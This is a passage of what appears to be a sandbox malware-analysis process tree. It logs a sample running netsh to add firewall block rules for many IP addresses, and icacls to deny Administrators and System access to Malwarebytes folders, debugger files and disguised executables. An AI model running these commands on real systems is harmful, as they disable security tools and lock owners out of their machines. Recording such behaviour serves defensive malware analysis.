            netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
            PID:4716
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
          PID:1008
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
            PID:2696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
          PID:4964
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
            PID:4640
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
          PID:5024
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
            PID:4236
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
          PID:4556
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
            PID:2968
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
          PID:4732
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
            PID:3480
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
          PID:3908
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
            PID:4280
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
          PID:4968
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
            PID:3696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
          PID:5060
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
            PID:1260
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
          PID:2028
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
            PID:4720
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
          PID:4336
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
            PID:4288
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
          PID:4584
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
            PID:4448
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
          PID:4348
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
            PID:3224
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
          PID:3000
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
            PID:4712
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
          PID:2776
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
            PID:4516
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
          PID:1532
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
            PID:4172
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
          PID:2036
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
            PID:4780
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
          PID:4824
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
            PID:3680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
          PID:5008
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
            PID:4284
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
          PID:4576
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
            PID:4748
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
          PID:4296
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
            PID:4796
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
          PID:4892
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
            PID:4308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
          PID:3764
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
            PID:4148
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
          PID:2348
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
            PID:5020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
          PID:4116
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
            PID:4220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
          PID:4852
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
            PID:4440
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
          PID:4904
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
            PID:5056
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
          PID:4368
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
            PID:4648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
          PID:4436
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
            PID:4564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
          PID:4816
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
            PID:400
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
          PID:4496
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
            PID:4652
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
          PID:4944
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
            PID:4364
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
          PID:4452
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
            PID:5032
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
          PID:4548
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
            PID:4504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
          PID:5096
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
            PID:2216
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
          PID:1176
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
            PID:4272
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
          PID:4984
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
            PID:4232
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
          PID:4936
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
            PID:4872
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
          PID:4848
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
            PID:4776
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
          PID:1984
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
            PID:940
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
          PID:1896
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:4380
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
          PID:4268
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
            Modifies file permissions
            PID:4520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
          PID:4476
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
            PID:4388
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
          PID:4136
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
            PID:3800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
          PID:4864
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
            Modifies file permissions
            PID:4420
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
          PID:5068
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4580
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
          PID:5108
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
            Modifies file permissions
            PID:4808
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
          PID:4544
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
            PID:5072
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
          PID:5000
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
            PID:4820
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
          PID:4104
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
            PID:4688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
          PID:4304
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5356
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
          PID:1640
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny System:(F)
            PID:5340
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
          PID:4868
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny система:(F)
            PID:5348
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
          PID:4752
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5484
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
          PID:3544
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
            PID:5476
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
          PID:4128
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5296
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
          PID:4812
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5304
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
          PID:4608
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
          PID:1252
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny System:(F)
            Modifies file permissions
            PID:5424
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
          PID:4160
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny система:(F)
            Modifies file permissions
            PID:5520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
          PID:5172
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5576
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
          PID:5376
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5620
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
          PID:5532
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
            PID:5632
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
          PID:5660
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5952
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
          PID:5704
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
            PID:6004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          PID:5716
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
            PID:5916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
          PID:5736
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
            PID:6020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
          PID:5772
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:6076
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
          PID:5804
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6068
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          PID:5932
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
            PID:6112
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
          PID:6040
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
            PID:5336
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
          PID:3960
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny System:(F)
            Modifies file permissions
            PID:5312
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
          PID:5412
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5300
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
          PID:4692
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny System:(F)
            PID:5408
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
          PID:2440
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:4356
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
          PID:5248
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny System:(F)
            Modifies file permissions
            PID:5592
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
          PID:4956
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
            Modifies file permissions
            PID:4764
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
          PID:4200
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny System:(F)
            Modifies file permissions
            PID:4840
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
          PID:4628
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny Администраторы:(F)
            PID:5224
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
          PID:5216
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny System:(F)
            PID:4396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
          PID:5236
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5652
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
          PID:5456
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny System:(F)
            Modifies file permissions
            PID:5676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
          PID:3984
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
            PID:5948
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
          PID:5968
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny System:(F)
            Modifies file permissions
            PID:5764
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
          PID:6064
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny Администраторы:(F)
            PID:5700
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
          PID:5140
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny System:(F)
            Modifies file permissions
            PID:5908
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
          PID:6128
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5876
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          PID:5972
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
          PID:5792
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
            PID:5324
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
          PID:5368
          • C:\Windows\SysWOW64\icacls.exe
